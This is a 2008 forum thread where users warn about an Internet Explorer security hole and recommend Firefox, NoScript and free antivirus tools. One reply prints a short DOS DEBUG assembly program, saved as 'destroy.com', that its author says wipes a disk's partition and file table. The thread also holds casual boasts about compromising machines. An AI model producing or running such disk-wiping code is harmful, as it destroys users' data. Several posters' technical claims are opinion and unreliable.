View Thread

Atheists Today » Easy Reading » The Lounge
Who is here? 1 guest(s)
 Print Thread
STOP USING IE ASAP!!!!
RayvenAlandria
I know most of you use Firefox or another browser, but for those who use IE, STOP!!!!!

Like right now.

Another security hole has been found and this one is uber-bad. A script can be uploaded to websites and you can get keylogged just by visiting those sites. It's infecting many legit sites, not just suspicious sites, so be careful. Even Abit, a well known computer company, was hacked and had a script uploaded to their website, which then infected many visitors. Microsnot claims they have a patch out that will protect you but I do not believe it. My advice is for users to stop using IE.

Google "IE security hole" or a similar phrase and you'll find many security sites discussing this.

Here's a couple...

http://voices.was...v=rss_blog

http://news.bbc.c...784908.stm

Doubting Thomas
That's why I use Firefox.
You're just jealous because the voices are talking to me and not you.

RayvenAlandria
Me too, but just in case anyone uses IE I wanted to get the word out.

General-Pryce
Does anyone still use IE? Surely it's like Outlook Express, it's one of those things you have on your computer but is just there as a pretty image never used?

I need to upgrade to Firefox 3 at some point.

Cynic
Yeah, like 80% of the market uses IE, myself included.

Doubting Thomas
Yeah, that's why these fucknuggets write all that malicious code for IE, because they know that the vast majority of the world uses it, and it's full of security holes.
You're just jealous because the voices are talking to me and not you.

Cynic
The question is, does IE really have more security holes, or is it that more have been found there?

seeker
Cynic - That's a good question. I think microsoft in general is more of a target

General-Pryce
It's like Macs get very little wrong with them. It appears hackers, virus creators tend to be attacking microsoft.... and can you blame them?

Cynic
Macs are surrounded by so many such myths that I fear we may soon have to create a forum here for their cult too.

Sinny
Oh shit I just had a bad bad bad puter virus. I have IE (internet explorer) and used to use outlook express.

I still use IE but no longer use Outlook Express. I have Optimum Online and they have their own mail from the one and only cable company in my area. I shoud go back to Firefox but have no time to fully get into all the add ons. I also have no clue if the add ons in Firefox cost anything ($$$) or if I have to pay to use Firefox. Either way my main internet provider is Optimum Online through my cable co as I said and may be stuck with IE like it or not.

You wouldn't believe what I went through with that virus. I lost absolutely everything. Fortunately I have Firelight to transfer everything on my puter but I feared I may have transferred the virus into that. I tried to reinstall everything using the Firelight and managed to get my docs, pics and everything else back in the folder labeled Firelight but then lost everything again. Since I lost everything a second time I didn't re-install what I had saved before the 2 biruse's from the Firelight in my puter again. So far I have been ok but for how long I have no clue. Damn that Windows took 5-6 hours to re-install not including the 3 days of constant updates.

RayvenAlandria
Sinny, go here and do a free online scan. Check the whole computer.

http://housecall....micro.com/

You can install AVG free edition if you don't want to pay for a virus scanner, the ones you pay for, Mcafee, Norton etc... tend to be garbage anyway. I use AVG and will never use any of the mainstream companies, they suck and cause a ton of computer problems.

http://free.avg.c...ee-edition

Installing Firefox is easy and you can import your bookmarks easily. Installing noscript is also easy. Just go here and download. It is free.

http://www.mozill...S/firefox/

https://addons.mo.../addon/722

I'm sorry you had a virus wipe you out. I know the feeling, it sux , big time. You might want to install spybot and adware as well and run scans.

http://www.spybot...index.html

http://www.lavaso...

Bob of QF
I haven't used an anti-virus program for years (except for an occasional on-line scan of a download I'm contemplating installing).

I've never had a virus on my PC, either. I switched from Micro$uck products back in, what? 2000? Whenever the Mozilla Suite first became available. That program, the precursor to Firefox/Thunderbird had both browser and e-mail client (aka an outlook clone).

Backup of the shortcuts was simplified into a single file. Backup of the entire history of my e-mail was simplified into a directory. (unlike M$ products, which require registry edits to restore...)

I used to run anti-spy programs, but no longer. On-line "anti-" scans always come up empty.

The MOST important add-in for FireFox (IMO) is "NoScript".

This little gem immediately blacklists all websites. Then, as you surf, you manually whitelist those sites (or part of those sites) you wish to see.

For example, I never whitelist "doubleclick.net" or any of it's derivatives. Thus, in one stroke, I've blocked a huge buttload of unwanted internet ads from even downloading their trashy images into my PC.

Thunderbird is the successor to Mozilla's original e-mail client, and does not run scripts (unlike Outlook and/or O.E.). Because of this, it's very hard to use passive infection methods.

And I *never* open attachments, unless I'm expecting them. Okay, once in a while, I have to have a sender re-send a legit attachment, but so what?

As I said, I've no need to bloat my PC with unneeded (to me) bloatware (anti-anything) nor do these resource-hogging programs run in the "background" (yeah, right...).

Never had a virus, nor a spybot, nor a trojan.

Of course, I do make it a habit to re-install the ultimate bloatware, Windoze, about every year or less..... from bare metal, natch.

Yeah, I'm anal retentive when it comes to my PC's. With respect to them, I don't shit for months at a time....

....but I don't need anti-whatever, either.... Grin

Quantum Junction: Use both lanes

Reality is that which is left, after you stop believing.

RayvenAlandria
Oh, a bit of advice about NoScript. It will block almost all scripts, even good ones, so if you go to a webpage that looks out of whack or won't load, or if you try to buy something at a site and it isn't working, look at the bottom of your browser and check to see if NoScript popped up a bar. If it did, click "options" and choose which scripts to allow to run.

Scripts can be nifty and they can allow cool things like animations and neat things to appear on websites, but they can also be evil and allow things like trojans and worms to install on your computer, so blocking them is a good thing unless you know they are safe to allow.

Using Noscript can be annoying when it's blocking harmless things and make a webpage not work properly, but I'd prefer the annoyance of having to manually allow scripts than to have tons of crap running in the background that I am not aware of.
Edited by RayvenAlandria on 12/18/2008 21:58

Bob of QF
RayvenAlandria wrote:
Oh, a bit of advice about NoScript. It will block almost all scripts, even good ones, so if you go to a webpage that looks out of whack or won't load, or if you try to buy something at a site and it isn't working, look at the bottom of your browser and check to see if NoScript popped up a bar. If it did, click "options" and choose which scripts to allow to run.

Scripts can be nifty and they can allow cool things like animations and neat things to appear on websites, but they can also be evil and allow things like trojans and worms to install on your computer, so blocking them is a good thing unless you know they are safe to allow.

Using Noscript can be annoying when it's blocking harmless things and make a webpage not work properly, but I'd prefer the annoyance of having to manually allow scripts than to have tons of crap running in the background that I am not aware of.

Excellent advice.

I'd also add that there is a "temporarily allow all this page" which temporarily unblocks all scripts on a page, until you close the browser.
Quantum Junction: Use both lanes

Reality is that which is left, after you stop believing.

General-Pryce
Cynic wrote:
Macs are surrounded by so many such myths that I fear we may soon have to create a forum here for their cult too.

Actually I have never had a problem with the mac, this PC however has been riddled with viruses. Maybe it's just because macs are super cool the virus runs away in fear of it's awesomeness? Grin

cheshiredragon
RayvenAlandria wrote:
Microsnot claims they have a patch out that will protect you but I do not believe it.

It is very bad to use opinion in technical work.

They DO have a patch and it was released yesterday the 17th. We patched our systems here at work already. We didn't want to get caught with our pants down. Especially on such an easy exploit. I tested the exploit with a few other people here and it is WICKED BAD. We took control of that XP box so fast and it did EVERYTHING our hearts desired. This is a horrible flaw, that is now, IF YOU RUN WINDOWSUPDATE AND PATCH YOUR COMPUTER, you will be all clear.

Current browser market share
IE
73%

FIREFOX
16%
Other browsers:
Chrome, Mozilla, Opera, Netscape & Safari fill the gap

The security is based in the Microsoft OS itself. Other apps have some security on their own but, the holes are
there and it is NOT that there have been more found, it is that there ARE more. You should see the difference
between a Linux Function Call and a Windows Function Call. The more an OS has to do to get a command done the more
opportunity there is for a flaw, security hole, etc. Microsoft is more of a target because it is easier to hack and
more people have it. The mentality(and truth) is that most Windows users are oblivious to what their computer can
do and what is installed on it. Can any of you tell me how many current processes are running on your computer?
Mine here at work has 39 and using 641MB of 4GB RAM.

MACs are good systems. I pride Apple for the advancements they have made lately. Adopting the Intel(x86)
architecture is what finally pushed me over the edge because now instead of a PPC Linux I can run and x86/64bit
version. WOO HOO!

For me an anti-virus is a WORTHLESS program. They never prevent a problem, they fix a problem that has already
happened and that is only if it has the definitions to cure that problem.
Here is the code of an old Assembly virus I wrote back in the day. Since I was 8yrs old this was the ONLY virus I had on my personal home machine until the Nimda worm. I advise you not to compile and run this code or you will be SOL and I will not help you fix it. What this code does (erases the FAT table, moves it and wipes the partitions) the information/data is still on the HDD but, the computer cant read it without a file system.

Download source  Code
-F 220 L1000 0
-A CS: 100
xxxx:0100 MOV AX,301
xxxx:0103 MOV BX,200
xxxx:0106 MOV CX,1
xxxx:0109 MOV DX,80
xxxx:010C INT 13
xxxx:010E INT 20
xxxx:0110
-n destroy.com
-rcx
CX 0000
:1C
-w

This is not worm code or anything that can hurt you. That is why I said do not compile and RUN. This is a VIRUS and needs to be run in order to infect. otherwise it is just text.

The better defense is a firewall or just generally good security. There are services and such that can be turned OFF that are not necessary. One item that comes to mind. Remote Registry, If you are running Windows 98SE all the way to Vista, this is ON by default. VERY BAD security. Would you like me to log into your Registry remotely and change it around to have it point to a poisoned DNS? ouch.

FireFox is "teh pwn" when it comes to browsers. The add-ons are great.
SINNY: if you tell me exactly what you do online I can set you up a custom firefox setup and send it to you. All you have to do is unzip the folder somewhere on your drive and make a shortcut to firefox.exe You don't even have to install ANYTHING. It is THAT simple.

NoScript is an AWESOME tool but, only for the technically advanced and would advise a begginer not to use it unless you live with a tech savvy person. I installed it on my roomies computer and it drove her insane because she didn't know how to use it. Even after I imported a nice whitelist. So, instead I removed it and installed a firewall.

and no the viruses don't run away from its awesomeness, even though they are hip little machines, they are UNIX coded and not run as Root. for a MAC or LINUX system to get owned there would have to be a flaw that allowed a step up to activate Root and then login as such. That is a complicated task since it has not been done yet and most cyber-criminals DO use Linux. The botnet commander machines are running Linux.

IN CONCLUSION:
IF you use IE and you have patched your system...TODAY, then you are clear of this nasty flaw.
That's right, I said it...

RayvenAlandria
General-Pryce wrote:
Cynic wrote:

Actually I have never had a problem with the mac, this PC however has been riddled with viruses. Maybe it's just because macs are super cool the virus runs away in fear of it's awesomeness? Grin

From what I've been told, Macs are designed to make you manually run all programs, so it's hard to get a virus unless you're dumb enough to install it yourself. It does happen though. The myth that Macs can't be infected is bullshit. I've know people with Macs who got hit with Viri, trojans etc...It's just less common than PC's rates. Macs are also as prone to worms as PC's are, which can be just as bad, if not worse, than the average virus.

Windows is designed to run itself, so non-techy people can use it. It will do things like run crap you don't know about, and auto-install crap. It's biggest selling point is also it's biggest weakness.

RayvenAlandria
IN CONCLUSION:
IF you use IE and you have patched your system...TODAY, then you are clear of this nasty flaw.

Until the next one comes along, which seems to happen every couple of months. Google "IE security hole" and find out how many uber-nasty holes like this one have caused grief to untold numbers of people over the years. IE is crap. The other browsers have holes as well, but they are smaller and exploits happen less often.

Cynic
It's like I always say -- if you don't want your bicycle stolen, buy a Huffy. ;-)

Jump to Forum: